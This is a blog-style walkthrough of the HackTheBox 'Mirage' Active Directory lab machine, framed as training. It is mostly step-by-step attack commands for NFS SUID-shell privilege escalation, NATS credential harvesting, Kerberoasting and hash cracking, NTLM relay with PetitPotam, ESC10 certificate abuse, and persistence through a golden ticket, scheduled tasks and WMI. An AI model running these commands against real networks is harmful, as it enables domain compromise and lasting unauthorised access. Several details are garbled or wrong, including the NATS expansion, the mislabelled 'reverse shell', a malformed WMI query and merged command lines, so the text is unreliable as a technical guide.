Listen to this Post
Introduction:
The HackTheBox Mirage machine presents a realistic Active Directory simulation exposing critical misconfigurations in enterprise services like NFS, NATS, and Kerberos. This attack chain demonstrates how seemingly minor oversights can be chained together to achieve complete domain compromise, highlighting the importance of comprehensive AD security hardening.
Learning Objectives:
- Master NFS enumeration and privilege escalation techniques
- Understand Kerberoasting attacks and service principal name exploitation
- Learn cross-session relay attacks and ADCS certificate template vulnerabilities
You Should Know:
1. NFS Enumeration and Initial Access
Network File Sharing (NFS) misconfigurations often provide the initial foothold in enterprise environments. The Mirage machine exposed an NFS share with no_root_squash, allowing remote attackers to create privileged files and gain initial access.
Step-by-step guide:
First, enumerate available NFS shares:
showmount -e 10.10.11.48
Mount the discovered share:
mkdir /tmp/nfs_mount mount -t nfs 10.10.11.48:/opt/mirage /tmp/nfs_mount -o nolock
Check the share configuration for no_root_squash vulnerability:
cat /etc/exports
Create a reverse shell payload and set SUID permissions:
Create C payload
echo 'int main(){setreuid(0,0); system("/bin/bash");}' > shell.c
gcc shell.c -o shell
cp shell /tmp/nfs_mount/
chmod +s /tmp/nfs_mount/shell
Execute the privileged binary to gain root-level access on the target system.
2. NATS Message System Exploitation
NATS (Neural Autonomic Transport System) is a cloud-native messaging system that, when misconfigured, can expose sensitive credentials and enable lateral movement.
Step-by-step guide:
Discover NATS configuration files:
find / -name "nats.conf" 2>/dev/null locate nats.conf
Extract credentials from NATS configuration:
cat /etc/nats/nats.conf | grep -E "user|password|token"
Use discovered credentials with NATS client:
nats-sub -s nats://user:[email protected]:4222 ">"
Monitor message queues for sensitive data transmission:
nats-pub -s nats://user:[email protected]:4222 "query" "status request"
3. Kerberoasting Attack Implementation
Kerberoasting targets service accounts that use Kerberos authentication, allowing attackers to crack service principal name (SPN) passwords offline.
Step-by-step guide:
Discover SPNs using Impacket:
python3 GetUserSPNs.py DOMAIN/user:password -dc-ip 10.10.11.48 -request
Alternative using PowerView:
Get-DomainUser -SPN | select samaccountname,serviceprincipalname Request-SPNTicket -SPN "MSSQLSvc/mirage.htb.local"
Export Kerberos tickets for cracking:
python3 GetUserSPNs.py -outputfile hashes.txt htb.local/user:Password123!
Crack the extracted hash with Hashcat:
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force
4. Cross-Session Relay Attacks
NTLM relay attacks can bypass traditional security controls by forwarding authentication requests between systems.
Step-by-step guide:
Set up Impacket’s ntlmrelayx:
python3 ntlmrelayx.py -t ldap://10.10.11.48 -wh attacker-wpad --delegate-access
Configure Responder for authentication capture:
python3 Responder.py -I eth0 -wFd
Trigger authentication requests through various methods:
python3 PetitPotam.py 10.10.14.2 10.10.11.48
Monitor for relayed credentials and delegated access opportunities.
5. Account Control Bypass via logonHours
Active Directory’s logonHours attribute can be manipulated to enable disabled accounts or extend access periods.
Step-by-step guide:
Check account status and logon hours:
Get-ADUser -Identity targetuser -Properties LogonHours,AccountExpirationDate
Modify logonHours using PowerView:
Set-ADUser -Identity targetuser -Replace @{logonHours=$null}
Alternative using ldapmodify:
ldapmodify -H ldap://10.10.11.48 -D "cn=admin,dc=htb,dc=local" -w password <<EOF dn: cn=targetuser,cn=users,dc=htb,dc=local changetype: modify replace: logonHours logonHours: ffffffffffffffffffffffffffffffffffffffffffffff EOF
Enable disabled accounts:
Enable-ADAccount -Identity targetuser
6. ESC10 Certificate Template Vulnerability
Active Directory Certificate Services vulnerability ESC10 allows domain escalation through misconfigured certificate templates.
Step-by-step guide:
Enumerate certificate templates using Certify:
Certify.exe find /vulnerable
Alternative with PowerShell:
Get-ADObject -LDAPFilter "(objectclass=pkicertificatetemplate)" | Select-Name,DistinguishedName
Request a vulnerable certificate:
Certify.exe request /ca:CA01.htb.local\HTB-CA01 /template:VulnerableTemplate /altname:domadmin
Convert and use the certificate for authentication:
Rubeus.exe asktgt /user:domadmin /certificate:cert.pfx /ptt
Gain domain admin access through certificate abuse.
7. Lateral Movement and Domain Persistence
Establish persistent access through various techniques including golden tickets and scheduled tasks.
Step-by-step guide:
Create golden ticket for persistence:
mimikatz kerberos::golden /user:Administrator /domain:htb.local /sid:S-1-5-21-1234567890 /krbtgt:aes256-key /ptt
Establish scheduled task for persistence:
schtasks /create /tn "Maintenance" /tr "C:\tools\shell.exe" /sc hourly /ru "SYSTEM" /s 10.10.11.48
Create WMI event subscription for persistence:
$Filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name="MaintenanceFilter"; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}
What Undercode Say:
- The Mirage machine demonstrates how multiple moderate-risk vulnerabilities can be chained to create a critical compromise path
- ADCS vulnerabilities represent an emerging attack vector that many organizations remain unprepared to defend against
- Traditional perimeter defense strategies are insufficient against authenticated AD attacks
The Mirage exploitation chain reveals fundamental flaws in how organizations approach Active Directory security. Each individual misconfiguration might be considered a medium-severity issue during risk assessment, but their combination creates a devastating attack path. The most concerning aspect is how these vulnerabilities span different administrative domains—NFS misconfigurations (often managed by infrastructure teams), NATS security (application teams), and AD certificate services (security teams). This compartmentalization of responsibility creates visibility gaps that attackers exploit. Organizations must implement cross-functional AD security reviews and assume breach postures that consider attack chains rather than individual vulnerabilities.
Prediction:
ADCS and certificate-based attacks will become the next frontline in enterprise security breaches as organizations harden against traditional Kerberoasting and NTLM relay attacks. Within two years, we predict certificate template vulnerabilities will surpass password-based attacks as the primary AD escalation method, forcing a fundamental rearchitecture of PKI management and monitoring strategies. The industry will need to develop new detection capabilities for certificate abuse patterns and implement stricter certificate template controls by default.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: 0xdf Htb – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
